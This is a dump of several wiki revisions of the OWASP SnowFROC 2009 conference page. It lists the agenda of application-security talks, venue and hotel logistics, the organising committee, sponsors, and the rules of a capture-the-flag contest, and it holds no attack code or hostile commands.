| style="width:10%; background:#7B8ABD" | 17:30-21:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | OWASP Social Gathering: Dinner and Drinks @ TBD<br />
|}<br />
<br />
<!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --><br />
<br />
==Capture the Flag (CTF)==<br />
<br />
This year FROC will be hosting a capture the flag game / contest throughout the day. The CTF consists of a LAMP web server target and a scoreboard. <br />
<br />
Your job as a player is to successfully attack the small vulnerable web applications we provide to obtain hidden codes (called "flags".) Enter a flag into the scoreboard and you're credited with the point value for that challenge.<br />
<br />
An entrant can be a team or an individual. Small prizes will be given for the top three finishing entrants, but the greatest prize, of course, is bragging rights. Winners will be announced (and prizes awarded) at the end of the conference as part of the conference wrap-up.<br />
<br />
Thanks to IBM for sponsoring this event and providing technical support.<br />
<br />
===CTF Rules===<br />
<br />
1. Don't attack other players. The contest is about finding and exploiting vulnerabilities in the applications provided. (yes, attacking application users is a real-world threat -- victims will be provided in the challenges where attacking a user is required.)<br />
<br />
2. Don't attack the infrastructure. Networks, routers, and the scoreboard are all off-limits as targets of attack.<br />
<br />
Anyone discovered breaking these rules will earn banning, forfeiture of all points, and very bad karma.<br />
<br />
==Logistics==<br />
<br />
Venue: [http://maps.google.com/maps?hl=en&ie=UTF8&cid=0,0,17887458453474608109&fb=1&split=1&gl=us&dq=Tivoli+Student+Union+in+downtown+Denver,+CO&daddr=900+Auraria+Pkwy+%23+325E,+Denver,+CO+80204&geocode=2315206160437382962,39.746366,-105.007463&ei=jKOsSeKrM5O5twfLh4GDBg&z=16 Tivoli Student Union] in downtown 900 Auraria Pkwy # 325E<br />
Denver, CO 80204 (303) 556-6330<br />
<br />
==Accommodations==<br />
<br />
OWASP has negotiated discounted rates with the Hotel Teatro. Rooms under the SnowFROC rate are $189/night and include courtesy Cadillac Escalade transportation to and from Auraria Campus. To reserve a room, contact Hotel Teatro at +1.303.228.1100 and mention SnowFROC. The discounted rate will be available until Monday, March 2.<br />
<br />
==Transportation to the Conference==<br />
===By plane===<br />
Denver can be reached by commercial aviation through the [http://www.flydenver.com/ Denver International Airport], which is a hub for United Airlines as well as Frontier.<br />
<br />
<br />
===How to get to the venue?===<br />
See the [http://maps.google.com/maps?hl=en&ie=UTF8&cid=0,0,17887458453474608109&fb=1&split=1&gl=us&dq=Tivoli+Student+Union+in+downtown+Denver,+CO&daddr=900+Auraria+Pkwy+%23+325E,+Denver,+CO+80204&geocode=2315206160437382962,39.746366,-105.007463&ei=jKOsSeKrM5O5twfLh4GDBg&z=16 Map].<br />
<br />
<br />
*By taxi: taxi from the airport to venue is about $50 USD<br />
<br />
*From hotel: transport from the conference hotel (Hotel Teatro) by limo is free<br />
<br />
*By car: there is plenty of parking at the Tivoli. Parking validation will be provided for registered SnowFROC participants.<br />
<br />
==Registration and Conference Fees==<br />
<br />
Due to the hard work of our organizers and the gracious support of our sponsors, SNOWFROC will once again be a FREE CONFERENCE!!!<br />
<br />
Despite the fact that this is a free conference, we still need you to register to ensure that we don't exceed venue capacity.<br />
<br />
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]<br />
<br />
==Conference Committee==<br />
<br />
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org<br />
<br />
SNOWFROC 2009 Planning Committee Chair: Kathy Thaxton - kthaxton 'at' owasp.org<br />
<br />
Colorado Chapter Hosts:<br />
* David Campbell - OWASP Denver - dcampbell 'at' owasp.org<br />
* Eric Duprey - OWASP Denver - eduprey 'at' exploits.org<br />
<br />
Vendor Exhibition Chair: Kathy Thaxton - kthaxton 'at' owasp.org<br />
<br />
Capture the Flag Chair: Eric Duprey - eduprey 'at' exploits.org<br />
<br />
CFP Chair: David Campbell - OWASP Denver - dcampbell 'at' owasp.org<br />
<br />
==[[OWASP AppSec Conference Sponsors | Conference Sponsors]]==<br />
<br />
The following organizations are proud sponsors of this conference:<br />
*Accuvant<br />
*Breach<br />
*Business Partner Solutions<br />
*Denim Group<br />
<!-- *Dirsec --><br />
*Fishnet Security<br />
<!-- *Fortify --><br />
*IBM<br />
*Imperva<br />
*Laz<br />
*Lares<br />
<!-- *Symplify --><br />
*Trustwave<br />
*WhiteHat Security<br />
<br />
If you are interested in sponsoring this OWASP conference, please contact Kathy Thaxton at kthaxton 'at' owasp.org.<br />
<br />
<br />
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].<br />
<br />
[[Category:OWASP AppSec Conference]]</div>Edupreyhttps://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&diff=56110Front Range OWASP Conference 20092009-03-04T19:03:04Z<p>Eduprey: </p>
<hr />
<div>[[Image:SnowFROCblue.jpg]]<br />
<hr><br />
Welcome to SnowFROC, the Winter 2009 Front Range OWASP Application Security Conference!<br />
<br />
After a successful FROC in June of 2008, we are back in Denver, Colorado USA on 5 March 2009! <br />
<br />
'''This year we again present a full day, FREE multi-track conference, which will provide valuable information for managers and executives as well as developers and engineers.'''<br />
<br />
In 2008, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2009. This year we organized the conference to occur during the peak of the [http://www.google.com/search?q=colorado+skiing Colorado ski season], so that speakers can head up to the nearby mountains before and/or after the conference to enjoy some of the legendary snow.<br />
<br />
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]<br />
<br />
<br />
==Conference Location==<br />
[[Image:Denver_mountains.JPG]]<br />
<br />
This year, the conference will be held at the [http://maps.google.com/maps?hl=en&ie=UTF8&cid=0,0,17887458453474608109&fb=1&split=1&gl=us&dq=Tivoli+Student+Union+in+downtown+Denver,+CO&daddr=900+Auraria+Pkwy+%23+325E,+Denver,+CO+80204&geocode=2315206160437382962,39.746366,-105.007463&ei=jKOsSeKrM5O5twfLh4GDBg&z=16 Tivoli Student Union] in downtown 900 Auraria Pkwy # 325E<br />
Denver, CO 80204 (303) 556-6330<br />
<br />
<br />
==Call for Presentations==<br />
The [[Front_Range_OWASP_Conference_2009_CFP|call for papers]] closed on 6 Feb 09. We received a tremendous response. Thanks to everybody who responded!<br />
<br />
<!-- ===[[SnowFROC Tentative Schedule]]=== --><br />
<br />
<br />
==Agenda and Presentations: 5 March 2009==<br />
<br />
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.<br />
<br />
{| style="width:80%" border="0" align="center"<br />
! colspan="3" align="center" style="background:#4058A0; color:white" | March 5, 2009<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 07:30-08:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Registration and Continental Breakfast in the Sponsor Expo Room<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:30-08:35 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Welcome to SnowFROC AppSec 2009 Conference <br />
''David Campbell, OWASP Denver''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:35-09:45 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Keynote: [[SnowFROC_Abstract_Grossman|"Top Ten Web Hacking Techniques of 2008: What's possible, not probable"]]<br />
''Jeremiah Grossman, Whitehat Security''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:45-10:15 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | OWASP State of the Union<br />
''Tom Brennan, OWASP Board''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:15-10:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:30-11:15 || style="width:40%; background:#BC857A" align="left" | "[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]"<br />
''Ed Bellis, Orbitz''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Zusman|"Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations"]]<br />
''Mike Zusman, Intrepidus Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:15-12:00 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Paller|"A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors"]]<br />
''Alan Paller, SANS''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Stads|"Adobe Flex, AMF 3 and BlazeDS: An Assessment"]] <br />
''Kevin Stadmeyer, Trustwave''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Peloquin|"Building an Effective Application Security Program"]]<br />
''Joey Peloquin, Fishnet Security''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Belani|"Bad Cocktail: Spear Phishing + Application Hacks"]]<br />
''Rohyt Belani, Intrepidus Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:50-14:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Byrne|"Automated vs. Manual Security: You can't filter The Stupid"]]<br />
''David Byrne & Charles Henderson, Trustwave''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Damele|"SQL injection: Not only AND 1=1"]]<br />
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 14:50-15:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Neucom|"Security Policy Management: Best Practices for Web Services and Application Security"]]<br />
''Ray Neucom, IBM''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Cornell_Dickson_Abstract|"Vulnerability Management in an Application Security World"]]<br />
''Dan Cornell & John Dickson, Denim Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:50-16:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Panel: Emerging Threats and Enterprise Countermeasures<br />
Moderator: John Dickson<br/><br />
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:30-17:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Conference Wrap Up, CTF Awards & Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 17:30-21:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | OWASP Social Gathering: Dinner and Drinks @ TBD<br />
|}<br />
<br />
<!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --><br />
<br />
==Logistics==<br />
<br />
Venue: [http://maps.google.com/maps?hl=en&ie=UTF8&cid=0,0,17887458453474608109&fb=1&split=1&gl=us&dq=Tivoli+Student+Union+in+downtown+Denver,+CO&daddr=900+Auraria+Pkwy+%23+325E,+Denver,+CO+80204&geocode=2315206160437382962,39.746366,-105.007463&ei=jKOsSeKrM5O5twfLh4GDBg&z=16 Tivoli Student Union] in downtown 900 Auraria Pkwy # 325E<br />
Denver, CO 80204 (303) 556-6330<br />
<br />
==Accommodations==<br />
<br />
OWASP has negotiated discounted rates with the Hotel Teatro. Rooms under the SnowFROC rate are $189/night and include courtesy Cadillac Escalade transportation to and from Auraria Campus. To reserve a room, contact Hotel Teatro at +1.303.228.1100 and mention SnowFROC. The discounted rate will be available until Monday, March 2.<br />
<br />
==Capture the Flag (CTF)==<br />
<br />
This year FROC will be hosting a capture the flag game / contest throughout the day. The CTF consists of a LAMP web server target and a scoreboard. <br />
<br />
Your job as a player is to successfully attack the small vulnerable web applications we provide to obtain hidden codes (called "flags".) Enter a flag into the scoreboard and you're credited with the point value for that challenge.<br />
<br />
An entrant can be a team or an individual. Small prizes will be given for the top three finishing entrants, but the greatest prize, of course, is bragging rights. Winners will be announced (and prizes awarded) at the end of the conference as part of the conference wrap-up.<br />
<br />
Thanks to IBM for sponsoring this event and providing technical support.<br />
<br />
===CTF Rules===<br />
<br />
1. Don't attack other players. The contest is about finding and exploiting vulnerabilities in the applications provided. (yes, attacking application users is a real-world threat -- victims will be provided in the challenges where attacking a user is required.)<br />
<br />
2. Don't attack the infrastructure. Networks, routers, and the scoreboard are all off-limits as targets of attack.<br />
<br />
Anyone discovered breaking these rules will earn banning, forfeiture of all points, and very bad karma.<br />
<br />
==Transportation to the Conference==<br />
===By plane===<br />
Denver can be reached by commercial aviation through the [http://www.flydenver.com/ Denver International Airport], which is a hub for United Airlines as well as Frontier.<br />
<br />
<br />
===How to get to the venue?===<br />
See the [http://maps.google.com/maps?hl=en&ie=UTF8&cid=0,0,17887458453474608109&fb=1&split=1&gl=us&dq=Tivoli+Student+Union+in+downtown+Denver,+CO&daddr=900+Auraria+Pkwy+%23+325E,+Denver,+CO+80204&geocode=2315206160437382962,39.746366,-105.007463&ei=jKOsSeKrM5O5twfLh4GDBg&z=16 Map].<br />
<br />
<br />
*By taxi: taxi from the airport to venue is about $50 USD<br />
<br />
*From hotel: transport from the conference hotel (Hotel Teatro) by limo is free<br />
<br />
*By car: there is plenty of parking at the Tivoli. Parking validation will be provided for registered SnowFROC participants.<br />
<br />
==Registration and Conference Fees==<br />
<br />
Due to the hard work of our organizers and the gracious support of our sponsors, SNOWFROC will once again be a FREE CONFERENCE!!!<br />
<br />
Despite the fact that this is a free conference, we still need you to register to ensure that we don't exceed venue capacity.<br />
<br />
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]<br />
<br />
==Conference Committee==<br />
<br />
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org<br />
<br />
SNOWFROC 2009 Planning Committee Chair: Kathy Thaxton - kthaxton 'at' owasp.org<br />
<br />
Colorado Chapter Hosts:<br />
* David Campbell - OWASP Denver - dcampbell 'at' owasp.org<br />
* Eric Duprey - OWASP Denver - eduprey 'at' exploits.org<br />
<br />
Vendor Exhibition Chair: Kathy Thaxton - kthaxton 'at' owasp.org<br />
<br />
Capture the Flag Chair: Eric Duprey - eduprey 'at' exploits.org<br />
<br />
CFP Chair: David Campbell - OWASP Denver - dcampbell 'at' owasp.org<br />
<br />
==[[OWASP AppSec Conference Sponsors | Conference Sponsors]]==<br />
<br />
The following organizations are proud sponsors of this conference:<br />
*Accuvant<br />
*Breach<br />
*Business Partner Solutions<br />
*Denim Group<br />
<!-- *Dirsec --><br />
*Fishnet Security<br />
<!-- *Fortify --><br />
*IBM<br />
*Imperva<br />
*Laz<br />
*Lares<br />
<!-- *Symplify --><br />
*Trustwave<br />
*WhiteHat Security<br />
<br />
If you are interested in sponsoring this OWASP conference, please contact Kathy Thaxton at kthaxton 'at' owasp.org.<br />
<br />
<br />
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].<br />
<br />
[[Category:OWASP AppSec Conference]]</div>Edupreyhttps://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&diff=55333Front Range OWASP Conference 20092009-02-23T22:30:25Z<p>Eduprey: /* Accommodations */</p>
<hr />
<div>[[Image:SnowFROCblue.jpg]]<br />
<hr><br />
Welcome to SnowFROC, the Winter 2009 Front Range OWASP Application Security Conference!<br />
<br />
After a successful FROC in June of 2008, we are back in Denver, Colorado USA on 5 March 2009! <br />
<br />
'''This year we again present a full day, FREE multi-track conference, which will provide valuable information for managers and executives as well as developers and engineers.'''<br />
<br />
In 2008, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2009. This year we organized the conference to occur during the peak of the [http://www.google.com/search?q=colorado+skiing Colorado ski season], so that speakers can head up to the nearby mountains before and/or after the conference to enjoy some of the legendary snow.<br />
<br />
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]<br />
<br />
<br />
==Conference Location==<br />
[[Image:Denver_mountains.JPG]]<br />
<br />
This year, the conference will be held at the Tivoli Student Union in downtown Denver, CO.<br />
<br />
==Call for Presentations==<br />
The [[Front_Range_OWASP_Conference_2009_CFP|call for papers]] closed on 6 Feb 09. We received a tremendous response. Thanks to everybody who responded!<br />
<br />
<!-- ===[[SnowFROC Tentative Schedule]]=== --><br />
<br />
<br />
==Agenda and Presentations: 5 March 2009==<br />
<br />
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.<br />
<br />
{| style="width:80%" border="0" align="center"<br />
! colspan="3" align="center" style="background:#4058A0; color:white" | March 5, 2009<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 07:30-08:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Registration and Continental Breakfast in the Sponsor Expo Room<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:30-08:35 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Welcome to SnowFROC AppSec 2009 Conference <br />
''David Campbell, OWASP Denver''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:35-09:45 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Keynote: [[SnowFROC_Abstract_Grossman|"Top Ten Web Hacking Techniques of 2008: What's possible, not probable"]]<br />
''Jeremiah Grossman, Whitehat Security''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:45-10:15 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | OWASP State of the Union<br />
''Tom Brennan, OWASP Board''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:15-10:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:30-11:15 || style="width:40%; background:#BC857A" align="left" | "[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]"<br />
''Ed Bellis, Orbitz''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Zusman|"Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations"]]<br />
''Mike Zusman, Intrepidus Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:15-12:00 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Paller|"A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors"]]<br />
''Alan Paller, SANS''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Stads|"Adobe Flex, AMF 3 and BlazeDS: An Assessment"]] <br />
''Kevin Stadmeyer, Trustwave''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Peloquin|"Building an Effective Application Security Program"]]<br />
''Joey Peloquin, Fishnet Security''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Belani|"Bad Cocktail: Spear Phishing + Application Hacks"]]<br />
''Rohyt Belani, Intrepidus Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:50-14:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Byrne|"Automated vs. Manual Security: You can't filter The Stupid"]]<br />
''David Byrne & Charles Henderson, Trustwave''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Damele|"SQL injection: Not only AND 1=1"]]<br />
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 14:50-15:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Neucom|"Security Policy Management: Best Practices for Web Services and Application Security"]]<br />
''Ray Neucom, IBM''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Cornell_Dickson_Abstract|"Vulnerability Management in an Application Security World"]]<br />
''Dan Cornell & John Dickson, Denim Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:50-16:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Panel: Emerging Threats and Enterprise Countermeasures<br />
Moderator: John Dickson<br/><br />
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:30-17:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Conference Wrap Up, CTF Awards & Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 17:30-21:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | OWASP Social Gathering: Dinner and Drinks @ TBD<br />
|}<br />
<br />
<!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --><br />
<br />
==Logistics==<br />
<br />
Venue: [http://www.tivoli.org/tivoli/ Tivoli Student Union, Denver, CO USA]<br />
<br />
==Accommodations==<br />
<br />
OWASP has negotiated discounted rates with the Hotel Teatro. Rooms under the SnowFROC rate are $189/night and include courtesy Cadillac Escalade transportation to and from Auraria Campus. To reserve a room, contact Hotel Teatro at +1.303.228.1100 and mention SnowFROC. The discounted rate will be available until Monday, March 2.<br />
<br />
==Transportation to the Conference==<br />
===By plane===<br />
Denver can be reached by commercial aviation through the [http://www.flydenver.com/ Denver International Airport], which is a hub for United Airlines as well as Frontier.<br />
<br />
<br />
===How to get to the venue?===<br />
See the [http://maps.google.com/maps?f=q&hl=en&q=tivoli+denver&ie=UTF8&ll=39.74785,-104.990931&spn=0.040189,0.061626&z=14&iwloc=A map].<br />
<br />
By taxi:<br />
*taxi from the airport to venue is about $50 USD<br />
<br />
<br />
==Registration and Conference Fees==<br />
<br />
Due to the hard work of our organizers and the gracious support of our sponsors, SNOWFROC will once again be a FREE CONFERENCE!!!<br />
<br />
Despite the fact that this is a free conference, we still need you to register to ensure that we don't exceed venue capacity.<br />
<br />
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]<br />
<br />
==Conference Committee==<br />
<br />
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org<br />
<br />
SNOWFROC 2009 Planning Committee Chair: Kathy Thaxton - kthaxton 'at' owasp.org<br />
<br />
Colorado Chapter Hosts:<br />
* David Campbell - OWASP Denver - dcampbell 'at' owasp.org<br />
* Eric Duprey - OWASP Denver - eduprey 'at' exploits.org<br />
<br />
Vendor Exhibition Chair: Kathy Thaxton - kthaxton 'at' owasp.org<br />
<br />
Capture the Flag Chair: Eric Duprey - eduprey 'at' exploits.org<br />
<br />
CFP Chair: David Campbell - OWASP Denver - dcampbell 'at' owasp.org<br />
<br />
==[[OWASP AppSec Conference Sponsors | Conference Sponsors]]==<br />
<br />
The following organizations are proud sponsors of this conference:<br />
*Accuvant<br />
*Breach<br />
*Business Partner Solutions<br />
*Denim Group<br />
<!-- *Dirsec --><br />
*Fishnet Security<br />
<!-- *Fortify --><br />
*IBM<br />
*Imperva<br />
*Laz<br />
*Lares<br />
<!-- *Symplify --><br />
*Trustwave<br />
*WhiteHat Security<br />
<br />
If you are interested in sponsoring this OWASP conference, please contact Kathy Thaxton at kthaxton 'at' owasp.org.<br />
<br />
<br />
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].<br />
<br />
[[Category:OWASP AppSec Conference]]</div>Edupreyhttps://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&diff=55332Front Range OWASP Conference 20092009-02-23T22:29:12Z<p>Eduprey: /* Accommodations */</p>
<hr />
<div>[[Image:SnowFROCblue.jpg]]<br />
<hr><br />
Welcome to SnowFROC, the Winter 2009 Front Range OWASP Application Security Conference!<br />
<br />
After a successful FROC in June of 2008, we are back in Denver, Colorado USA on 5 March 2009! <br />
<br />
'''This year we again present a full day, FREE multi-track conference, which will provide valuable information for managers and executives as well as developers and engineers.'''<br />
<br />
In 2008, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2009. This year we organized the conference to occur during the peak of the [http://www.google.com/search?q=colorado+skiing Colorado ski season], so that speakers can head up to the nearby mountains before and/or after the conference to enjoy some of the legendary snow.<br />
<br />
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]<br />
<br />
<br />
==Conference Location==<br />
[[Image:Denver_mountains.JPG]]<br />
<br />
This year, the conference will be held at the Tivoli Student Union in downtown Denver, CO.<br />
<br />
==Call for Presentations==<br />
The [[Front_Range_OWASP_Conference_2009_CFP|call for papers]] closed on 6 Feb 09. We received a tremendous response. Thanks to everybody who responded!<br />
<br />
<!-- ===[[SnowFROC Tentative Schedule]]=== --><br />
<br />
<br />
==Agenda and Presentations: 5 March 2009==<br />
<br />
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.<br />
<br />
{| style="width:80%" border="0" align="center"<br />
! colspan="3" align="center" style="background:#4058A0; color:white" | March 5, 2009<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 07:30-08:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Registration and Continental Breakfast in the Sponsor Expo Room<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:30-08:35 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Welcome to SnowFROC AppSec 2009 Conference <br />
''David Campbell, OWASP Denver''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:35-09:45 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Keynote: [[SnowFROC_Abstract_Grossman|"Top Ten Web Hacking Techniques of 2008: What's possible, not probable"]]<br />
''Jeremiah Grossman, Whitehat Security''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:45-10:15 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | OWASP State of the Union<br />
''Tom Brennan, OWASP Board''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:15-10:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:30-11:15 || style="width:40%; background:#BC857A" align="left" | "[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]"<br />
''Ed Bellis, Orbitz''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Zusman|"Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations"]]<br />
''Mike Zusman, Intrepidus Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:15-12:00 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Paller|"A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors"]]<br />
''Alan Paller, SANS''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Stads|"Adobe Flex, AMF 3 and BlazeDS: An Assessment"]] <br />
''Kevin Stadmeyer, Trustwave''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Peloquin|"Building an Effective Application Security Program"]]<br />
''Joey Peloquin, Fishnet Security''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Belani|"Bad Cocktail: Spear Phishing + Application Hacks"]]<br />
''Rohyt Belani, Intrepidus Group''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:50-14:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Byrne|"Automated vs. Manual Security: You can't filter The Stupid"]]<br />
